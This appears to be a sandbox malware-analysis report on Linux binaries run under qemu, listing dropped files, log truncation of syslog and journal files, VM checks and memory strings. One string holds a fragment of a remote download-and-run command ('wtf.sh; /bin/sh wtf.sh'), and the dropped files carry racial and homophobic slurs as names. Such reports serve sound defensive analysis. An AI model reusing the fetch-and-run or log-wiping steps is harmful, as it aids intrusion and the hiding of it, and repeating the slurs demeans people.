Source: lol.16.dr Dropped file: segment LOAD with 7.9242 entropy (max. 8.0)
Source: lmao (deleted).26.dr Dropped file: segment LOAD with 7.9285 entropy (max. 8.0)
Source: faggot (deleted).32.dr Dropped file: segment LOAD with 7.8949 entropy (max. 8.0)
Source: gay.47.dr Dropped file: segment LOAD with 7.9704 entropy (max. 8.0)
Source: retard.55.dr Dropped file: segment LOAD with 7.9567 entropy (max. 8.0)
Source: nigger (deleted).65.dr Dropped file: segment LOAD with 7.9656 entropy (max. 8.0)
Source: shit (deleted).71.dr Dropped file: segment LOAD with 7.9574 entropy (max. 8.0)
Source: nigga (deleted).77.dr Dropped file: segment LOAD with 7.8889 entropy (max. 8.0)
Source: what (deleted).89.dr Dropped file: segment LOAD with 7.9522 entropy (max. 8.0)
Source: /tmp/retard (PID: 6419) Truncated file: /var/log/syslog Jump to behavior
Source: /tmp/retard (PID: 6419) Truncated file: /var/log/kern.log Jump to behavior
Source: /tmp/retard (PID: 6419) Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal Jump to behavior
Source: /tmp/retard (PID: 6419) Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/user-1000.journal Jump to behavior
Source: /tmp/lol (PID: 6222) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/gay (PID: 6405) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/retard (PID: 6411) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6268) Queries kernel information via 'uname': Jump to behavior
Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: /arm/tmp/vmware-root_721-4290559889
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsdviceurnald
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmp Binary or memory string: $/tmp/vmware-root_721-4290559889,
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp Binary or memory string: !/var/lib/PackageKit!/var/lib/ucf/cache!/var/lib/vmware/VGAuthr1/var/lib/vmware/VGAuth/aliasStore!/var/lib/geoclue!/var/lib/vmware/arm/var1/var/cache/private/fwupdmgr/fwupd!/var/lib/lightdm-data!/var/lib/grub/esprm/varQ/var/lib/systemd/deb-systemd-helper-enabled/cloud-final.service.wantsar1/var/lib/update-notifier0!/var/lib/fwupd!/var/lib/boltd/arm/var1/var/cache/dictionaries-common0!/var/lib/fwupd/gnupg!/var/lib/grub/ucfrm/varQ
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmp Binary or memory string: Wx86_64/usr/bin/qemu-mips./lol0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./lol
Source: sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6519.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6521.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6549.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6552.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp Binary or memory string: $x86_64/usr/bin/qemu-arm./retard0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./retard
Source: lol, 6262.1.00007f41f8468000.00007f41f846e000.rw-.sdmp Binary or memory string: vmware-root_721-4290559889c(59889c(
Source: lol, 6226.1.00005580be181000.00005580be1a8000.rw-.sdmp Binary or memory string: U1/tmp/vmware-root_721-42905598891/var/log/installer/block0
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips./lol0day8.244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your displayT`
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: rU1/var/lib/snapd/ssl/store-certspell!/var/lib/snapd/sequence1/tmp/vmware-root_721-4290559889!/dev/misc/watchdogQ/var/lib/app-info/icons/ubuntu-focal-updates-universe/64x641/var/lib/emacsen-common/state/package
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp Binary or memory string: /var/lib/vmware
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp Binary or memory string: @/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmp Binary or memory string: vmware-root_721-4290559889
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp Binary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmp Binary or memory string: vmware-root_721-4290559889ck59889ck
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp Binary or memory string: hXUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp Binary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp Binary or memory string: U!/sbin/mount.vmhgfs
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: /sbin/mount.vmhgfs
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmp Binary or memory string: vmware
Source: lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmp Binary or memory string: /proc/6411/exe/usr/bin/qemu-armystemd-hostnamednitorye4-notifyd-agent-1
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: !/sbin/xfs_db!/sbin/gdiskrU/arm/sbi1/sbin/lvmpolld/arm/sbin/gdisk0!/sbin/getcap!/sbin/pptpsetup/arm/sbi1/sbin/select-default-ispell0!/sbin/pccardctl1/sbin/slattach/arm/bi10!/sbin/mount.vmhgfs!/sbin/isosize!/sbin/grpck
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp Binary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889P/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i4/tmp/snap.lxd
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm./retard0day244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your display
Source: sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: rUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmp Binary or memory string: /tmp/vmware-root_721-4290559889
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp Binary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp Binary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerh/
Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: rUP!/tmp/ssh-hOQ5FjG2iVgOa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-At6pzha/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg1/var/lib/emacsen-common/stateOQ5FjG2iVg!/var/lib/python !/tmp/snap.lxdervice-APWQ/var/lib/polkit-1/localauthority/90-mandatory.dP!/tmp/snap.lxd/tmp1/var/lib/emacsen-common/state/flavor!/var/lib/emacsen-commona/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlhq/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlh/tmp.service-54jva/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8estemd-hostnaa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e/tmp.service!/varqemu-binfmt/arm/tmp1/var/log/installer/block
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmp Binary or memory string: $/tmp/vmware-root_721-4290559889
Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: qemu-binfmt/arm/tmp1
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp Binary or memory string: /var/lib/vmware/VGAuth
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmp, sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp Binary or memory string: Enqx86_64/usr/bin/qemu-arm./gay0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./gay
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips./lol0dayT`
Source: retard, 6444.1.00007f1484041000.00007f1484047000.rw-.sdmp Binary or memory string: vmware-root_721-429055988959889
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs